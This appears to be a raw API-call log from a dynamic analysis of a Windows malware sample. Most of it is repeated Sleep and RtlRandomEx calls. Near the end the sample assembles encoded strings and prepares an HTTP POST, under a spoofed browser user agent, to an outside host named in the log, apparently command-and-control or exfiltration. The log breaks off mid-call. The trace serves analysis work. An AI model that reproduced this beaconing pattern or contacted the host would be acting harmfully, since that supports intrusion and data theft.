Sleep (dwMilliseconds=0x258) [0145.098] Sleep (dwMilliseconds=0x258) [0145.114] Sleep (dwMilliseconds=0x258) [0145.129] Sleep (dwMilliseconds=0x258) [0145.145] Sleep (dwMilliseconds=0x258) [0145.161] Sleep (dwMilliseconds=0x258) [0145.178] Sleep (dwMilliseconds=0x258) [0145.239] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x26) returned 0x82f2300 [0145.239] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0145.240] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e86c28c [0145.240] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0xe4) returned 0x82f2350 [0145.240] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ddd392b [0145.240] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c8d9293 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50d02669 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x661ce441 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e0825aa [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9dcb2d3 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f89611b [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56659ba6 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4369bb13 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c325bb1 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78a17cd7 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66acbe20 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32bf9fd8 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62a377f1 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1654e173 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x142db7d9 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11cdb37b [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c90e742 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1670bb0b [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x589902ee [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40f1af91 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x59d98241 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c775921 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x749cb4d4 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18b3709e [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47854029 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfa90fc0 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15f74b46 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6196de61 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x603543b9 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70deb22a [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x746636bd [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56e3d1f9 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x438f4f78 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x224f120a [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70d6e0ea [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a8523fd [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29f1c038 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19a00554 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc3e0613 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x142ed119 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x864adc5 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c3ae426 [0145.241] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7310768d [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7fc4ff48 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbe458dd [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5616705a [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31ab4b0a [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32a15a56 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15e1820c [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x188ce1a6 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d9973ed [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ce04f46 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x612590c9 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42541630 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x390b1c29 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7855c3fb [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c12d8fa [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeebba5b [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6fbc1111 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12ea3b7b [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb4a77a3 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x143649b4 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7736fbee [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e410edb [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70a7a5b0 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x184785a1 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeff34e [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b525720 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x424fb03a [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17825bdf [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a8ca260 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c986417 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f6cf455 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23a3926c [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7310768d [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x763eaf96 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21a7ba14 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x436d59c0 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7624dae8 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ff4ad41 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x447c347a [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b006fd8 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3dd46b24 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a6906a5 [0145.242] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4af89a6e [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c55b1cf [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x124d9a52 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa78acfa [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58d58a12 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b3aa99d [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f4e3e2c [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4927bf1b [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x357432ec [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4028010e [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50a73338 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x224f120a [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a14a1a1 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f97a727 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fae6d5f [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61a37d02 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c2a2f67 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x67dfc64b [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f1cbff0 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f444f26 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46182214 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1609887 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64de4a43 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40baf07e [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ac90b08 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a9328f8 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69c0f603 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f4b909 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14c9127f [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x611ba09b [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33d495f2 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x449d881f [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x726c1963 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35531c5f [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1193b33 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x223fde70 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x586a4ddc [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b6f4133 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x294d81ac [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x668a8f4b [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9f8380d [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a41ec6f [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31689b63 [0145.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x65665b8b [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26168fe7 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70fd947d [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15e012ad [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb40a7d3 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x312b5f3f [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5620a7f3 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x108c686f [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e860910 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4770a1ac [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14b54bff [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d326f11 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4886863f [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x633a4b7a [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21c94f5 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5269e180 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d6aa099 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31453414 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9225655 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e42c3a4 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61a71e4b [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d07bdc2 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2cec6d8c [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x27a4c19f [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6142ce1d [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d48f616 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2cbb969b [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e67d61 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e016acc [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc7fa0a3 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17a503c [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ea17b04 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70734bd7 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71b430a1 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b95edc8 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d8b5289 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3aeb55b4 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2764b41d [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14365954 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38ce89c0 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x105778c0 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55008105 [0145.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f6bf165 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x453dcafb [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39cb2ef1 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e80b4fd [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x106eb37f [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b7d92d0 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77f83312 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fb8a69e [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a62c1fc [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c1b30e1 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c94b44a [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66187e9d [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57604be5 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x558be0e8 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36698431 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b348fd3 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x65b2e4bd [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63fb3c35 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58a5596e [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d32ee66 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x108190c4 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x348e24b8 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ae048a5 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50df1b33 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bef91d0 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6504489c [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9468661 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a808fcc [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f51e334 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe5b1893 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5acf68d7 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40d79e28 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c8c0ed8 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b123419 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xab6026f [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f6ed5e [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x475d5feb [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x126b3c8d [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x255c07cf [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x579c83e7 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1549462 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25640392 [0145.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58994afb [0145.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ae49034 [0145.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3af345ea [0145.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x428a187b [0145.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e0642ae [0145.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x596bea6b [0145.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f33d3f4 [0145.246] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x133) returned 0x82f2440 [0145.246] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0145.246] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0145.246] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0145.246] lstrcatA (in: lpString1="", lpString2="HL,BgBf[$r&O16J0\\'2OvTzCGHOeh,M,Tac%\\SCH0.UlqtIq-[!\\Yzg2rU\"`z(K#N5zS9%2ut$AlgmsCT'!YD12mKU:slSk9c\\>p-^>w7yHjme=T4T49n^R@;;&M8,rP.\\V^BXB,K'TjLW`!LI4IH1%lV=,&kZGUF(A\"3$s'+HNLdhp-^>w7yHjme=T4T49n^R@;;&M8,rP.\\V^BXB,K'TjLW`!LI4IH1%lV=,&kZGUF(A\"3$s'+HNLdhp-^>w7yHjme=T4T49n^R@;;&M8,rP.\\V^BXB,K'TjLW`!LI4IH1%lV=,&kZGUF(A\"3$s'+HNLdhBfh1V\"/eP;S=F27c7o\\w8bDY\"2$fy2Z\"h%-3=[\\XcEimM\\<_O6lGGByFs=VM!@Au@J,GtFSR2(L*:EngJGLCm%aCV1@[/4B4srmAg>':,[.XB1$hty'55^O'kXKF*2mIb@Du8t&D>rB#2I-Apwoe#\"4X6=2%vEm+?azf^^`.;em7\"+_a'67nU_Z4;YE'kOsGqsw7Cn4m+rcUWv$elgQ" | out: lpString1="6B`s':KQE>Bfh1V\"/eP;S=F27c7o\\w8bDY\"2$fy2Z\"h%-3=[\\XcEimM\\<_O6lGGByFs=VM!@Au@J,GtFSR2(L*:EngJGLCm%aCV1@[/4B4srmAg>':,[.XB1$hty'55^O'kXKF*2mIb@Du8t&D>rB#2I-Apwoe#\"4X6=2%vEm+?azf^^`.;em7\"+_a'67nU_Z4;YE'kOsGqsw7Cn4m+rcUWv$elgQ") returned="6B`s':KQE>Bfh1V\"/eP;S=F27c7o\\w8bDY\"2$fy2Z\"h%-3=[\\XcEimM\\<_O6lGGByFs=VM!@Au@J,GtFSR2(L*:EngJGLCm%aCV1@[/4B4srmAg>':,[.XB1$hty'55^O'kXKF*2mIb@Du8t&D>rB#2I-Apwoe#\"4X6=2%vEm+?azf^^`.;em7\"+_a'67nU_Z4;YE'kOsGqsw7Cn4m+rcUWv$elgQ" [0171.613] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10c) returned 0x82f2620 [0171.613] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0171.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x82f2300, cbMultiByte=30, lpWideCharStr=0x82f2620, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0171.613] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x814f518 | out: pProxyConfig=0x814f518) returned 1 [0171.695] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb0120 [0171.696] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x814f5d0 | out: lpUrlComponents=0x814f5d0) returned 1 [0171.697] WinHttpConnect (hSession=0x3fb0120, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3fa9cf0 [0171.697] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2740 [0171.697] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x68) returned 0x82f2760 [0171.697] WinHttpOpenRequest (hConnect=0x3fa9cf0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x6e9a680 [0171.698] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, 